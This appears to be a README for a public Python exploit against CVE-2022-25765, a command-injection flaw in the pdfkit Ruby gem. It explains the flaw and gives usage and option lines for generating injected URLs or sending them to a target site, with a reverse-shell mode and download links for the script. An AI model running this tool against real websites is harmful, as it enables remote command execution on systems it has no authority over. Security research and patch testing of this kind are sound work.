## https://sploitus.com/exploit?id=87EB95BA-F287-5A34-944C-400C152156E5
# Exploit for CVE-2022-25765 (pdfkit) - Command Injection

![GitHub CVE Cover](https://user-images.githubusercontent.com/23003787/219503380-083bd0fc-80e0-4d99-8f38-06c065aaa2d0.png)

**Like this repo? Give us a ⭐!**

*For educational and authorized security research purposes only.*

## Exploit Author

[@UNICORDev](https://unicord.dev) by ([@NicPWNs](https://github.com/NicPWNs) and [@Dev-Yeoj](https://github.com/Dev-Yeoj))

## Vulnerability Description

All releases of the `pdfkit` gem before 0.8.7.2 are vulnerable to command injection: a URL handed to the gem is not properly sanitized before it is placed in the shell command used to invoke the wkhtmltopdf renderer.

## Exploit Description

The Ruby gem `pdfkit` is commonly used to convert websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) can be passed a specially crafted URL that embeds a shell command, and that command is executed on the host when the PDF is rendered. This exploit either generates such URLs for manual use or sends them directly to a vulnerable website running `pdfkit`, using the POST parameter that the site forwards to the gem.

## Usage

```bash
  python3 exploit-CVE-2022-25765.py -c <command>
  python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022-25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022-25765.py -h
```

## Options

```
  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.
```

## Download

[Download exploit-CVE-2022-25765.py from GitHub](https://raw.githubusercontent.com/UNICORDev/exploit-CVE-2022-25765/main/exploit-CVE-2022-25765.py)

[Download exploit-CVE-2022-25765.py from ExploitDB](https://www.exploit-db.com/exploits/51293)

### Searchsploit (ExploitDB)

```bash
searchsploit -u
searchsploit -m 51293
```

## Exploit Requirements

- python3
- python3:requests
- python3:urllib3

## Demo

### Custom Command Mode

![cropped command](https://user-images.githubusercontent.com/23003787/221307314-3af99159-2768-4195-b51b-8279cc436a35.gif)

### Reverse Shell Sent to Target Website Mode

![exploit-CVE-2022-25765](https://user-images.githubusercontent.com/23003787/221304847-8d5cafaa-246a-432c-9301-f21271f6d607.gif)

## Tested On

pdfkit Version 0.8.6

## Applies To

pdfkit Versions < 0.8.7.2

## Test Environment

```bash
gem install pdfkit -v 0.8.6
```

## Credits

- https://nvd.nist.gov/vuln/detail/CVE-2022-25765
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795